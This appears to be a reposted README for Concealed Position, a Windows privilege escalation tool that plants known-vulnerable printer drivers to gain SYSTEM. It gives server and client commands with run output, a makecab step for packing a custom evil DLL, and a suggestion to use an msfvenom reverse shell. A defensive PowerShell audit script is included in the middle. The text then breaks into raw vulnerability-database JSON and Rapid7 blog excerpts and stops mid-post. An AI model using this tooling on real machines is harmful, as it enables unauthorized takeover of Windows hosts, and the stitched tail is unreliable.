Concealed Position is a local [privilege escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation> "privilege escalation" ) attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the _as designed_ package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with [known vulnerabilities](<https://www.kitploit.com/search/label/Known%20Vulnerabilities> "known vulnerabilities" ) which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.
**What exploits are available**
Concealed Position offers four exploits - all with equally dumb names:
* ACIDDAMAGE - [CVE-2021-35449](<https://nvd.nist.gov/vuln/detail/CVE-2021-35449> "CVE-2021-35449" ) - Lexmark Universal Print Driver LPE
* RADIANTDAMAGE - [CVE-2021-38085](<https://nvd.nist.gov/vuln/detail/CVE-2021-38085> "CVE-2021-38085" ) - Canon TR150 Print Driver LPE
* POISONDAMAGE - [CVE-2019-19363](<https://nvd.nist.gov/vuln/detail/CVE-2019-19363> "CVE-2019-19363" ) - Ricoh PCL6 Print Driver LPE
* SLASHINGDAMAGE - [CVE-2020-1300](<https://nvd.nist.gov/vuln/detail/CVE-2020-1300> "CVE-2020-1300" ) - Windows Print Spooler LPE
The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.
**But which exploit should I use?!**
Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL), and SLASHINGDAMAGE, hopefully, is patched most everywhere.
**How does it work?**
Concealed Position has two parts: an evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:

```text
Stage 1: Stage the driver in the driver store
  client to server: GetPrinterDriver
  server to client: Response with driver

Stage 2: Install the driver from the driver store
  client: InstallPrinterDriverFromPackage

Stage 3: Add a local printer (exploitation stage)
  client: Add printer
```
It is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.
**Is this a Windows vulnerability?**
Arguably, yes. The driver store is a ["trusted collection of ... third-party driver packages"](<https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store> "trusted collection of ... third-party driver packages" ) that requires administrator access to modify. Using `GetPrinterDriver` a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.
Microsoft seemed to agree when they issued [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481> "CVE-2021-34481" ).
Although... it's arguable that this is simply a feature of the system and not a [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> "vulnerability" ) at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.
**Which versions of Windows are affected by CVE-2021-34481?**
At least Windows 8.1 and above.
**How do I use these tools?**
Simple! So simple there will be many paragraphs to describe it!
**CP Server**
First, let's look at cp_server's command line options:

```text
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

CLI options:
  -h, --help                     Display the help message
  -e, --exploit arg              The exploit to use
  -c, --cabs arg (=.\cab_files)  The location of the cabinet files

Exploits available:
  ACIDDAMAGE
  POISONDAMAGE
  RADIANTDAMAGE
  SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
```

Above you can see the server requires two options:

1. The exploit to configure the printer for
2. A path to this repository's cab_files (.\cab_files\ is the default)
For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:

```text
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
```

And that's it, you'll see a new printer on your system:

```text
PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name                          ComputerName Type  DriverName                PortName        Shared Published
----                          ------------ ----  ----------                --------        ------ ---------
ACIDDAMAGE                                 Local Lexmark Universal v2      LPT1:           True   False
CutePDF Writer                             Local CutePDF Writer v4.0       CPW4:           False  False
OneNote for Windows 10                     Local Microsoft Software Pri... Microsoft.Of... False  False
Microsoft XPS Document Writer              Local Microsoft XPS Document... PORTPROMPT:     False  False
Microsoft Print to PDF                     Local Microsoft Print To PDF    PORTPROMPT:     False  False
Fax                                        Local Microsoft Shared Fax D... SHRFAX:         False  False

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
```
Note that there is one manual step that `cp_server` prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!
The process for using `SLASHINGDAMAGE` is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and _then_ you'll still need to follow a couple of manual steps and reboot.
**CP Client**
The client is similarly easy to use. Let's look at its command line options:

```text
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

CLI options:
  -h, --help         Display the help message
  -r, --rhost arg    The remote evil printer address
  -n, --name arg     The remote evil printer name
  -e, --exploit arg  The exploit to use
  -l, --local        No remote printer. Local attack only.
  -d, --dll arg      Path to user provided DLL to execute.

Exploits available:
  ACIDDAMAGE
  POISONDAMAGE
  RADIANTDAMAGE
```
First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.
`cp_client` has two modes: remote and local. The remote option is the most interesting because it adds the [vulnerable driver](<https://www.kitploit.com/search/label/Vulnerable%20Driver> "vulnerable driver" ) to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:
1. The exploit I want to use
2. The evil printer IP address
3. The name of the evil shared printer
Like this!

```text
C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_ | ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!
```
That's it! To execute a local only attack, you just need to provide the exploit:

```text
C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
```
**Why doesn't the client have a SLASHINGDAMAGE option?**
`SLASHINGDAMAGE` doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:
```text
echo "evil.dll" "../../evil.dll" > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab
```
It's probably important to know that the version of `SLASHINGDAMAGE` in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.
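The posture check and artifact sweep a defender would want against what the "Is this a Windows vulnerability?" and usage sections describe, as an added PowerShell example that is not part of the Concealed Position repository: it reads the Point and Print policy values Microsoft introduced alongside CVE-2021-34481 (RestrictDriverInstallationToAdministrators, NoWarningNoElevationOnInstall, UpdatePromptSettings), lists installed drivers matching the three vendor drivers named above, and tests for the files the stock payloads write. The driver name patterns are constructed from the CVE list above and are assumptions, not vendor-exact strings.

```powershell
# Audit script (added example, not from the Concealed Position repo).
# Run in an elevated PowerShell on the host being assessed.

$PnpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Get-PointAndPrintPosture {
    # Read a DWORD from the policy key; $null when the value is not configured.
    function Read-Value([string]$Name) {
        $props = Get-ItemProperty -Path $PnpKey -Name $Name -ErrorAction SilentlyContinue
        if ($null -eq $props) { return $null }
        return $props.$Name
    }

    $restrict = Read-Value 'RestrictDriverInstallationToAdministrators'
    $noWarn   = Read-Value 'NoWarningNoElevationOnInstall'
    $update   = Read-Value 'UpdatePromptSettings'

    [pscustomobject]@{
        # Since the August 2021 servicing update, an absent value behaves as 1 (admins only).
        RestrictDriverInstallationToAdministrators = if ($null -eq $restrict) { '1 (default, not configured)' } else { $restrict }
        # 0 is the secure value for both of these; anything else suppresses the warning/elevation prompt.
        NoWarningNoElevationOnInstall              = if ($null -eq $noWarn) { '0 (default, not configured)' } else { $noWarn }
        UpdatePromptSettings                       = if ($null -eq $update) { '0 (default, not configured)' } else { $update }
        # Weak when non-admin driver installs are explicitly re-enabled or prompts are suppressed.
        Weak = ($null -ne $restrict -and $restrict -eq 0) -or ([int]$noWarn -gt 0) -or ([int]$update -gt 0)
    }
}

function Get-SuspectPrintDrivers {
    # Constructed patterns for the vendor drivers the tool ships (CVE-2021-35449,
    # CVE-2021-38085, CVE-2019-19363). A match means "review this driver", not "compromised".
    $patterns = @('Lexmark Universal', 'Canon TR150', 'Ricoh.*PCL6')
    Get-PrinterDriver | Where-Object {
        $name = $_.Name
        [bool]($patterns | Where-Object { $name -match $_ } | Select-Object -First 1)
    } | Select-Object Name, Manufacturer, InfPath, DriverVersion
}

function Get-ConcealedPositionArtifacts {
    # Files the README says the stock payloads write. Presence indicates the tool ran with its
    # embedded DLL; a custom --dll payload leaves different traces, so absence proves nothing.
    $paths = @(
        'C:\result.txt',                        # written by the embedded payload
        'C:\tmp\Dll.dll',                        # staged by the ACIDDAMAGE client
        "$env:SystemRoot\System32\ualapi.dll"    # dropped by the SLASHINGDAMAGE server variant
    )
    foreach ($p in $paths) {
        [pscustomobject]@{ Path = $p; Present = (Test-Path -LiteralPath $p) }
    }
}

Get-PointAndPrintPosture       | Format-List
Get-SuspectPrintDrivers        | Format-Table -AutoSize
Get-ConcealedPositionArtifacts | Format-Table -AutoSize
```

A `Weak` of `True`, or any suspect driver present on a host that has no business with that vendor's printers, is what to follow up on; the artifact list only catches the default payload described on this page.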
**Pull Requests and Bugs**
Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.
**Other things**
One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).
**[Download Concealed_Position](<https://github.com/jacob-baines/concealed_position> "Download Concealed_Position" )**
"OPENVAS:1361412562310817141", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817157", "OPENVAS:1361412562310817158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156251", "PACKETSTORM:163795", "PACKETSTORM:163811"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0273C620A27B80D02C6196B7E3DA3048", "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}, {"type": "securelist", "idList": ["SECURELIST:CE954DA57A5EE857B62F0E00D36A5003"]}, {"type": "thn", "idList": ["THN:3F83D0C001F2A9046C61A56F5ABE7695", "THN:6428957E9DED493169A2E63839F98667", "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "THN:F601EBBE359B3547B8E79F0217562FEF"]}, {"type": "threatpost", "idList": ["THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-33859", "1337DAY-ID-33926"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-19363", "epss": 0.00071, "percentile": 0.29104, "modified": "2023-05-03"}, {"cve": "CVE-2020-1300", "epss": 0.05216, "percentile": 0.91798, "modified": "2023-05-03"}, {"cve": "CVE-2021-34481", "epss": 0.00662, "percentile": 0.76646, "modified": "2023-05-03"}, {"cve": "CVE-2021-35449", "epss": 0.00114, "percentile": 0.43609, "modified": "2023-05-03"}, {"cve": "CVE-2021-38085", "epss": 0.00053, "percentile": 0.18808, "modified": "2023-05-03"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1685464390, "score": 1685458448, "epss": 0}, "_internal": {"score_hash": "c138ee7c4318f70415573e273a93670a"}, "toolHref": "https://github.com/jacob-baines/concealed_position"}
{"rapid7blog": [{"lastseen": "2021-08-13T19:00:30", "description": "## Print Driver PrivEsc\n\n\n\nIf you attended DEF CON last week, you may have seen [this talk on print driver vulnerabilities](<https://www.youtube.com/watch?v=vdesswZYz-8>) from Metasploit community contributor [Jacob Baines](<https://github.com/jacob-baines>). In the spirit of Friday the 13th, we're highlighting some of these "print nightmares" again, in the form of two new Metasploit modules that Jacob added. \nThe first is a [Canon TR150 Print Driver Local Privilege Escalation module](<https://github.com/rapid7/metasploit-framework/pull/15520>), which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>). The second is a [Lexmark Universal Print Driver Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) module, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>). Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a `SYSTEM` user.\n\n## Atlassian Crowd RCE\n\nAlso new in this week's release is an [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Rapid7's own [Grant Willcox](<https://github.com/gwillcox-r7>), which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>). This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and achieve unauthenticated remote code execution. This module also includes a check method for verifying whether a target is vulnerable to this exploit. It should be noted that this vulnerability made the U.S. 
Cybersecurity and Infrastructure Security Agency\u2019s (CISA) list of the [12 most routinely exploited vulns for 2020](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n## New module content (3)\n\n * [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Corben Leo, Grant Willcox, and Paul, which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>) \\- This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.\n * [Canon Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15520>) by Jacob Baines and Shelby Pace, which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>) \\- A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the `SYSTEM` user.\n * [Lexmark Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) \\- A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain `SYSTEM` level code execution.\n\n## Enhancements and features\n\n * [#15327](<https://github.com/rapid7/metasploit-framework/pull/15327>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue in the RPC analyze command. 
Adds automated integration tests to ensure it doesn't break in the future.\n * [#15430](<https://github.com/rapid7/metasploit-framework/pull/15430>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both `auxiliary/scanner/ssh/ssh_login` and `auxiliary/scanner/ssh/ssh_login_pubkey` modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).\n * [#15493](<https://github.com/rapid7/metasploit-framework/pull/15493>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updated Metasploit's dependency on Rails from version 5.2 to 6.1\n * [#15523](<https://github.com/rapid7/metasploit-framework/pull/15523>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.\n * [#15535](<https://github.com/rapid7/metasploit-framework/pull/15535>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `psexec` module has been updated to use the `SMBSHARE` option name instead of `SHARE` for better consistency across modules. 
Users can still use the old `SHARE` option if needed, however this should be considered deprecated.\n\n## Bugs fixed\n\n * [#15524](<https://github.com/rapid7/metasploit-framework/pull/15524>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/enum_network` module, caused by it searching for language-specific strings in the output to determine success.\n * [#15534](<https://github.com/rapid7/metasploit-framework/pull/15534>) from [timwr](<https://github.com/timwr>) \\- Fixes a regression issue in `post/multi/manage/shell_to_meterpreter` where the generated Powershell command length was greater than the limit of 8192 characters after string obfuscation was applied.\n * [#15536](<https://github.com/rapid7/metasploit-framework/pull/15536>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The HiveNightmare module has been updated to correctly use the `INTERATIONS` option instead of the `NBRE_ITER` option when performing the loop to call `check_path()`. 
This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.\n * [#15542](<https://github.com/rapid7/metasploit-framework/pull/15542>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a regression with Meterpreter's initialize methods, which caused Meterpreter scripts to be broken.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-04T11%3A50%3A27%2B01%3A00..2021-08-12T17%3A57%3A38%2B01%3A00%22>)\n * [Full diff 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/compare/6.0.56...6.1.0>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-08-13T18:25:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580", "CVE-2021-35449", "CVE-2021-38085"], "modified": "2021-08-13T18:25:09", "id": "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "href": "https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit 
chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). 
Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. 
ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. 
